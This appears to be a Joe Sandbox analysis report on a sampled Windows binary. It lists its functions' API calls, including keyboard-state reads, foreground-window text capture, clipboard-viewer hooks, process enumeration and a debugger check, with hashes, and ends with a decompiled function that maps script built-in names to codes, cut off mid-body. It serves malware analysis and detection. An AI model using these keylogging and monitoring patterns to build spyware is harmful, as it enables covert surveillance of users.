Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$ChildEnumWindows$ClassClientCursorForegroundFromIconicNamePointRectScreen_memset
String ID:
API String ID: 2861960800-0
Opcode ID: 74263b0eb0f3e97179cb5c131d55b3e9a5e7386ba9a6948aa9340af0f558fbd2
Instruction ID: 0de9339a583adcf31e5afe3a109d5d4f38653f308ab06659f1a49fe71bc829bc
Opcode Fuzzy Hash: 74263b0eb0f3e97179cb5c131d55b3e9a5e7386ba9a6948aa9340af0f558fbd2
Instruction Fuzzy Hash: 8871C2716083019BE310DF69D881B6BB7E9ABC5714F044A2FF98487341DB79DD44CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0045E6E0, Relevance: 15.1, APIs: 10, Instructions: 123processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0045E6F5
Process32FirstW.KERNEL32(00000000,00000000), ref: 0045E707
__wcstoi64.LIBCMT ref: 0045E733

Part of subcall function 004984B0: wcstoxq.LIBCMT ref: 004984D1

Process32NextW.KERNEL32(00000000,?), ref: 0045E754
__wsplitpath.LIBCMT ref: 0045E795
__wcsicoll.LIBCMT ref: 0045E7E5
Process32NextW.KERNEL32(?,?), ref: 0045E7FB
CloseHandle.KERNEL32(00000000), ref: 0045E80E
CloseHandle.KERNEL32(00000000), ref: 0045E821
CloseHandle.KERNEL32(?), ref: 0045E838

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CloseHandleProcess32$Next$CreateFirstSnapshotToolhelp32__wcsicoll__wcstoi64__wsplitpathwcstoxq
String ID:
API String ID: 2291101207-0
Opcode ID: 79ea9194d9bbd8169eba91b3c1ae3a9c6c50a1fbd72928778a4a346ea1d3760b
Instruction ID: aded409fbc670b566d586e3335f476d58ee186e0f65fa713153ab51804a0978d
Opcode Fuzzy Hash: 79ea9194d9bbd8169eba91b3c1ae3a9c6c50a1fbd72928778a4a346ea1d3760b
Instruction Fuzzy Hash: 1E31F6726043046BD724EF65DC45BEF37A8EB85315F08492EF90687282EB79960CC79A

Uniqueness

Uniqueness Score: -1.00%

Function 00445220, Relevance: 12.1, APIs: 8, Instructions: 107windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000C,00000000,00000001), ref: 004452E2
IsWindowVisible.USER32(?), ref: 004452EB
ShowWindow.USER32(?,00000005,?,?,?,00444B06), ref: 00445304
IsIconic.USER32 ref: 0044530C
ShowWindow.USER32(?,00000009,?,?,?,00444B06), ref: 0044531F
GetForegroundWindow.USER32(?,?,?,00444B06), ref: 00445321
SetForegroundWindow.USER32(?,?,?,?,00444B06), ref: 00445332
SendMessageW.USER32(?,000000B6,00000000,000F423F), ref: 0044535D

Part of subcall function 0043A3A0: GetForegroundWindow.USER32(745DBB20,?,?,00000001), ref: 0043A3AA
Part of subcall function 0043A3A0: GetWindowTextW.USER32 ref: 0043A3BF
Part of subcall function 0043A3A0: _wcsncpy.LIBCMT ref: 0043A466

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$Foreground$MessageSendShow$IconicTextVisible_wcsncpy
String ID:
API String ID: 3350946471-0
Opcode ID: 031b5418b139919b1cf96ef088ef0931688e8961c9491f7b1ab67d824d433b47
Instruction ID: aafd276092f0de434b8bfd06e616a91fe6a3d8fc6d23bd65856b7b8b0fe7add0
Opcode Fuzzy Hash: 031b5418b139919b1cf96ef088ef0931688e8961c9491f7b1ab67d824d433b47
Instruction Fuzzy Hash: 2331077154AA11ABEA10EF64EC80B6BB365BB45750F41847BF81187252F7B9EC048F8E

Uniqueness

Uniqueness Score: -1.00%

Function 0044CF10, Relevance: 10.6, APIs: 7, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044CF4B
GetFileSizeEx.KERNEL32(00000000,?,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044CF5E
CloseHandle.KERNEL32(00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044CF67
FindFirstFileW.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044CF77
GetLastError.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044CF82
FindClose.KERNEL32(00000000,?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044CFBE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044D02A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: File$CloseFind$CreateErrorFirstHandleLastSizeUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1680075938-0
Opcode ID: b1c45f9864f3c4f73d6e7c68692128138659bbf10baa06e5f996ff272c11d98a
Instruction ID: d43d6762f5feb8e3e84e240894da7acb9618a44dd21478d3ff4aa5960fb4e31b
Opcode Fuzzy Hash: b1c45f9864f3c4f73d6e7c68692128138659bbf10baa06e5f996ff272c11d98a
Instruction Fuzzy Hash: D541E4717443006BE320DB28DC86F6B7BD8EB85724F10822FF9549B2D1D7B8A805CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00418B10, Relevance: 10.6, APIs: 7, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 00418B19
_memset.LIBCMT ref: 00418B42
ToUnicodeEx.USER32(0000006E,00000000,?,?,00000002,00000000,00000000), ref: 00418B63
ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000000,00000000), ref: 00418B89
ToUnicodeEx.USER32(0000006E,00000000,?,?,00000002,00000000,00000000), ref: 00418BA6
ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000000,00000000), ref: 00418BEA
MapVirtualKeyExW.USER32(?,00000002,00000000), ref: 00418C13

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Unicode$KeyboardLayoutVirtual_memset
String ID:
API String ID: 2910491412-0
Opcode ID: 0e0ded4f6e65c29c2b3a9384bf2ab8e2a46710d3a27ab8b6b39fb984f2db0fa3
Instruction ID: 8581bbc867271d1c471bd4d281222c6f7b1fdc9242663de3bff542b152fe6193
Opcode Fuzzy Hash: 0e0ded4f6e65c29c2b3a9384bf2ab8e2a46710d3a27ab8b6b39fb984f2db0fa3
Instruction Fuzzy Hash: 1C31E2721583547BE3209B51CC46FEB7BE8AB85B04F44481EF684990C1E6B5B608C7BA

Uniqueness

Uniqueness Score: -1.00%

Function 00417A90, Relevance: 7.6, APIs: 5, Instructions: 84keyboardthreadCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000000), ref: 00417A9B
GetKeyState.USER32(00000000), ref: 00417ACA
GetForegroundWindow.USER32(00000000), ref: 00417B04
GetWindowThreadProcessId.USER32(00000000), ref: 00417B0B
GetKeyState.USER32(00000014), ref: 00417B4E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: State$Window$ForegroundProcessThread
String ID:
API String ID: 2921243749-0
Opcode ID: 1e2f2d438a781317e4d784faf2eb6fd12fd823072490b9d2b31f6d6a758ce1a7
Instruction ID: 6132c67a66d488dd5d294a717d3eb9eb6a056a566309e33a03675cf839f5a538
Opcode Fuzzy Hash: 1e2f2d438a781317e4d784faf2eb6fd12fd823072490b9d2b31f6d6a758ce1a7
Instruction Fuzzy Hash: 67216B71B8830826FA306B046C47FEB7B244751B59F54411BF698393E3D3A924C0476E

Uniqueness

Uniqueness Score: -1.00%

Function 004A01D7, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004A604A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004A605F
UnhandledExceptionFilter.KERNEL32(004AE8B4), ref: 004A606A
GetCurrentProcess.KERNEL32(C0000409), ref: 004A6086
TerminateProcess.KERNEL32(00000000), ref: 004A608D

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 750267b2b659817289366fc39dc582cc4f7e70b22af312127465817daa6f9feb
Instruction ID: 38b64f9460635c0cb8b2f4bb57847d382f8ab4f84cca394c75d00fef1501ad8e
Opcode Fuzzy Hash: 750267b2b659817289366fc39dc582cc4f7e70b22af312127465817daa6f9feb
Instruction Fuzzy Hash: 6821CEB5906A04DFD740EF25ED896587BB5FB29305F90407FE8088B3A0EBB459818F0E

Uniqueness

Uniqueness Score: -1.00%

Function 00417970, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004179A8
GetForegroundWindow.USER32(?,004162F2,?,00000000), ref: 004179F4
GetWindowTextW.USER32 ref: 00417A21

Strings

N/A, xrefs: 00417A4A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$CountForegroundTextTick
String ID: N/A
API String ID: 3416458291-2525114547
Opcode ID: 1d591e94b7b94a73d855b8852044c9d2656ce1c3552e18c4dab206aa9ad53a45
Instruction ID: 64e9eca424280aa675d9fad88059ae993fdbf70476ba573fa11bfd9c2b49f0bf
Opcode Fuzzy Hash: 1d591e94b7b94a73d855b8852044c9d2656ce1c3552e18c4dab206aa9ad53a45
Instruction Fuzzy Hash: 2F316F3120E200CFC728CF24E994A69BBF1EB88380F05C97FE8458B364E7349941CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0047F380, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,?), ref: 0047F3BE
FindClose.KERNEL32(00000000,?,?,?), ref: 0047F3CA
GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 0047F3E5

Strings

\\?\, xrefs: 0047F393

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID: \\?\
API String ID: 48322524-4282027825
Opcode ID: 15b78fb4b98d80981e3573c55d6fc4f46fa393c14989dc413ece83bd0f6f4e9c
Instruction ID: 0284eea28aff29e082d8ed0b93a2acdbdcd945b335a6a3e1925f9d4e629f4f64
Opcode Fuzzy Hash: 15b78fb4b98d80981e3573c55d6fc4f46fa393c14989dc413ece83bd0f6f4e9c
Instruction Fuzzy Hash: 4B01F275500A1157DB206A24EC896EB37A5AF81330F98C23AFC2C923C1E73D985E9A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004051A0, Relevance: 6.1, APIs: 4, Instructions: 51clipboardCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004051BB
OpenClipboard.USER32(?), ref: 004051CC
GetTickCount.KERNEL32 ref: 004051E0
OpenClipboard.USER32(?), ref: 0040521A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ClipboardCountOpenTick
String ID:
API String ID: 420724667-0
Opcode ID: 69846a95dd183dbb8bc7b342efddba8ad38b149d1978b5285e96f7b2202c524a
Instruction ID: 79914eeec008a9af804cf7d6a82baea711cf88422f79318d447b46c9599d9bbe
Opcode Fuzzy Hash: 69846a95dd183dbb8bc7b342efddba8ad38b149d1978b5285e96f7b2202c524a
Instruction Fuzzy Hash: 970157327016019BD3108B68EC84B5737AAAB94329F14803BE500DB3D4D779DC95CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0047FA60, Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(03211AA0,?,00000008,?,?,?,?,?,?,00444ABE,80000000,80000000), ref: 0047FA7F
IsIconic.USER32 ref: 0047FA8C
GetWindowRect.USER32 ref: 0047FAA0
ClientToScreen.USER32 ref: 0047FABE

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$ClientForegroundIconicRectScreen
String ID:
API String ID: 4031265896-0
Opcode ID: 12f949ddeec0aa68483a38f633f4194bd19f5bc064b222309f990733485e7fe2
Instruction ID: 485ba07c04be4638a7506a9dfb20e3ddc23978dc7e859864af6a7e03b9b38412
Opcode Fuzzy Hash: 12f949ddeec0aa68483a38f633f4194bd19f5bc064b222309f990733485e7fe2
Instruction Fuzzy Hash: 97017C315042129BC710DF18C888BBBBBE4EB85710F05853AE89D92215EB749C09C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 0047FA00, Relevance: 6.0, APIs: 4, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000003,?,00000000,00414FDE,?), ref: 0047FA04
IsIconic.USER32 ref: 0047FA11
GetWindowRect.USER32 ref: 0047FA27
ClientToScreen.USER32 ref: 0047FA45

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$ClientForegroundIconicRectScreen
String ID:
API String ID: 4031265896-0
Opcode ID: 69aa1c645e1608dc042b16b3022830d0d6c16a5972e07711788a30ca010765df
Instruction ID: 27903f42890d330a02a9b62d6477d9c6d1c6c1112d903ef66bdfb8aa2071ed6a
Opcode Fuzzy Hash: 69aa1c645e1608dc042b16b3022830d0d6c16a5972e07711788a30ca010765df
Instruction Fuzzy Hash: 74F03070505712DFD750DF18C894BAB7BE8AF85395F40D53AE84D92210E738D90D8BEA

Uniqueness

Uniqueness Score: -1.00%

Function 00448CC0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 00448CF8
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00448D5C

Strings

\, xrefs: 00448D20

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: DiskFreeSpace_wcsncpy
String ID: \
API String ID: 1165104651-2967466578
Opcode ID: 4bef0c85ee97e1e6e4af260e12d70ac5840778fcd7d4ed759421b8f9fd7b48cc
Instruction ID: 5f877e650ba59738e422eddd8c5f7277121db75cdb621d8e8cb20f607d5cd4f2
Opcode Fuzzy Hash: 4bef0c85ee97e1e6e4af260e12d70ac5840778fcd7d4ed759421b8f9fd7b48cc
Instruction Fuzzy Hash: 6C310972A0430067D720EB59DC45BDFB7D8EB94720F14462FF954A72D0EBB8A944C399

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB10, Relevance: 4.5, APIs: 3, Instructions: 45clipboardwindowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000415,00000001,00000000), ref: 0041DB54
SetClipboardViewer.USER32(?,0041DAF2), ref: 0041DB67
ChangeClipboardChain.USER32(?,00000000,0041DAF2), ref: 0041DBA9

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Clipboard$ChainChangeMessagePostViewer
String ID:
API String ID: 1822368796-0
Opcode ID: 4a3c2e2314c991e5d008f365d19c11af5f0d5d3041304b0c25965630eb5af9ad
Instruction ID: 55952dab448ca5fa88101243393e95770c71e14c720f4bca33c6ff9e630a398d
Opcode Fuzzy Hash: 4a3c2e2314c991e5d008f365d19c11af5f0d5d3041304b0c25965630eb5af9ad
Instruction Fuzzy Hash: FC0184B0A4B3529BDB10DB38ED54B963BD4A749380F09847BA455C73A1D234AC85CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00449DC0, Relevance: 3.1, APIs: 2, Instructions: 87comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004BB4C0,00000000,00000017,004BB4D0,?,?), ref: 00449DDF
__fassign.LIBCMT ref: 00449E04

Part of subcall function 0049A69D: wcstoxl.LIBCMT ref: 0049A6AD

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CreateInstance__fassignwcstoxl
String ID:
API String ID: 2223545676-0
Opcode ID: 30bf6daf1bb5dfd88e990495f0631490a04701023cd147cb5784066ad19d91b4
Instruction ID: f1f5c379dbc200ae9def6b115b7ce9b3bf397cef319028b2b8e5f07983f5cf06
Opcode Fuzzy Hash: 30bf6daf1bb5dfd88e990495f0631490a04701023cd147cb5784066ad19d91b4
Instruction Fuzzy Hash: BE219C35700710AFD610EA58CC81F5BB3E9AFC8B14F248459FA49DB3A1E675EC02DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00417220, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

mouse_event.USER32 ref: 0041726F

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: e479bebb37f15e196b2b363836a5c25b47191f49298fd6f1df9090a9e759e16f
Instruction ID: e573424d1a3aba041b57bcff796921113fdebe08216f1be1445465efd2d2ef98
Opcode Fuzzy Hash: e479bebb37f15e196b2b363836a5c25b47191f49298fd6f1df9090a9e759e16f
Instruction Fuzzy Hash: A1F027B3B150206AD718873DEC41FF7B7A9E7C6312F28837BF4098200092352C49C664

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0E0, Relevance: 89.5, APIs: 26, Strings: 25, Instructions: 215
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0041B0E0(short* __esi) {
				signed int _t27;
				void* _t56;

				if(__esi == 0 ||  *__esi == 0) {
					return 0;
				} else {
					if(E00498079(_t56, __esi, L"Asc") != 0) {
						if(E00498079(_t56, __esi, L"Chr") != 0) {
							if(E00498079(_t56, __esi, L"Deref") != 0) {
								if(E00498079(_t56, __esi, L"HTML") != 0) {
									if(E00498079(_t56, __esi, L"Mod") != 0) {
										if(E00498079(_t56, __esi, L"Pow") != 0) {
											if(E00498079(_t56, __esi, L"Exp") != 0) {
												if(E00498079(_t56, __esi, L"Sqrt") != 0) {
													if(E00498079(_t56, __esi, L"Log") != 0) {
														if(E00498079(_t56, __esi, L"Ln") != 0) {
															if(E00498079(_t56, __esi, L"Round") != 0) {
																if(E00498079(_t56, __esi, L"Ceil") != 0) {
																	if(E00498079(_t56, __esi, L"Floor") != 0) {
																		if(E00498079(_t56, __esi, L"Abs") != 0) {
																			if(E00498079(_t56, __esi, L"Sin") != 0) {
																				if(E00498079(_t56, __esi, L"Cos") != 0) {
																					if(E00498079(_t56, __esi, L"Tan") != 0) {
																						if(E00498079(_t56, __esi, L"ASin") != 0) {
																							if(E00498079(_t56, __esi, L"ACos") != 0) {
																								if(E00498079(_t56, __esi, L"ATan") != 0) {
																									if(E00498079(_t56, __esi, L"BitAnd") != 0) {
																										if(E00498079(_t56, __esi, L"BitOr") != 0) {
																											if(E00498079(_t56, __esi, L"BitXOr") != 0) {
																												if(E00498079(_t56, __esi, L"BitNot") != 0) {
																													if(E00498079(_t56, __esi, L"BitShiftLeft") != 0) {
																														_t27 = E00498079(_t56, __esi, L"BitShiftRight");
																														asm("sbb eax, eax");
																														return ( ~_t27 & 0xffffffe5) + 0x1b;
																													} else {
																														return 0x1a;
																													}
																												} else {
																													return 0x19;
																												}
																											} else {
																												return 0x18;
																											}
																										} else {
																											return 0x17;
																										}
																									} else {
																										return 0x16;
																									}
																								} else {
																									return 0x15;
																								}
																							} else {
																								return 0x14;
																							}
																						} else {
																							return 0x13;
																						}
																					} else {
																						return 0x12;
																					}
																				} else {
																					return 0x11;
																				}
																			} else {
																				return 0x10;
																			}
																		} else {
																			return 0xf;
																		}
																	} else {
																		return 0xe;
																	}
